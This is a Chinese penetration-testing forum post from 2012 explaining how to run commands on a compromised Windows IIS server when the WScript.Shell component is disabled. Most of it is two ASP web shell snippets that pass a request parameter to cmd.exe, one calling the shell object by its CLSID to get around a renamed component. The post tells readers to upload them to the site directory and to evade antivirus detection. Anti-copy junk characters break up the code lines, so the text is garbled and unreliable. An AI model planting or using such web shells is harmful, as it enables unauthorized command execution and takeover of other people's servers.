找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3088|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。" |% U2 J0 k  q2 o0 C+ l
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。0 ?% k3 `- G  m( Y; ~/ t4 H7 t- k! t) y# Q
  • 要想让运行命令可以试试这种方法,成功率为五五之数。
    0 n% H( p0 \* ?" _* B2 _4 j) W
  • 把下面代码复制:
    2 Z$ w# W. a9 o
  • <%
    % F$ Z/ l1 u5 p" u
  • end if. h8 I0 I( H+ U; B6 [9 {( A: W
  • response.write(”"): M' U( e0 N/ @* F
  • On Error Resume : r: J9 [4 c' r
  • Next3 h3 G! V* i! z/ T0 P8 N7 Q
  • response.write oScriptlhn.exec(”cmd.exe /c” & : U( U7 }3 _( d4 ^9 _
  • request(”c”)).stdout.readall
    & G! y; j, o  y3 o0 K4 G
  • response.write(”"): b+ Y6 l8 R0 [/ p; R
  • response.write(”")3 V( l. G9 D$ @# G
  • response.write(”
    , F. Z& _7 S/ R; r0 b' X
  • “)2 y5 h" r& u  e
  • response.write(”")8 v; ]5 U) J: @$ y8 a
  • %>
    6 ]2 A* D6 \1 {
  • 保存为一个asp文件,然后传到网站目录上去
    ; C5 y. z8 o% _/ J
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
    2 x, i% f+ n) n8 H
  • 我用此成功运行过cacls命令。
    " T$ J, [9 @! G
  • 第二那就是运行时出错,可能限制某些代码执行
    & N! A- T' t$ M. ?: y' ]
  • 无wscript.shell组件提权又一个方法* I2 }5 E, I& d  R" x0 w
  • <object runat=server id=oScriptlhn scope=page 5 I% T9 t6 m* p7 I% N* P

  • 8 \5 E9 Z$ k0 Y, R3 ]( p  X1 W) d8 k5 C
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>: q8 l# I; [. ?
  • <%if err then%>
    ! ^5 Q. d+ ~% \/ f+ E( L9 h; r. |
  • <object runat=server id=oScriptlhn scope=page . s1 m( \/ w) _; l8 ?& U$ v
  • % u& p0 `, ]' y/ t$ Z: V! s9 |
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>1 `( [5 K( X! K9 a  o+ }. A# t
  • <%
    ) s. A5 d( A0 J; A6 _* @0 B
  • end if ) z2 Q) Q: T, s/ b# \6 u
  • response.write(”<textarea readonly cols=80 ) r/ M+ S4 S! \& q
  • - i1 z9 O! m, Z, M# w% e0 R
  • rows=20>”)
    7 x, L. n% _" g1 ~
  • On Error Resume Next
      K6 W! q& I, `4 U( y1 J# J9 U
  • response.write
    # u, i6 l* m8 d+ b8 u. @5 I

  •   ^" z. b' b# G" h' ^/ \/ V6 I
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall: m2 _; |# }& }. W
  • response.write(”</textarea>”)
    + f  b8 J5 s+ P( `# S2 P: A
  • response.write(”<form
    0 ~) l9 S- L! n: y* _8 w5 R* v5 l
  • 9 E; ^( a- k: J
  • method=’post’>”)
    * o$ |4 b4 F( z
  • response.write(”<input type=text name=’c' 3 m. l/ {8 Y# ^4 T& g$ W

  • $ L4 H* e; L; W3 j  Y7 r- z- w
  • size=60><br>”)
    : a: l; I* [1 {8 H
  • response.write(”<input type=submit / N; u0 E1 y; y$ t1 m8 J
  • 0 ?( ?1 w; a& G# K: o( U
  • value=’执行’></form>”) $ R3 |5 o/ b) L# G+ U. r- A, y) ?0 |/ L
  • %>! K$ Y  |3 b$ |4 Z* I
  • 保存为ASP,此代码可能被杀,请注意免杀。) H! X6 O6 C3 p% R% V
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建4 B1 C! x, r% P9 U1 s
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表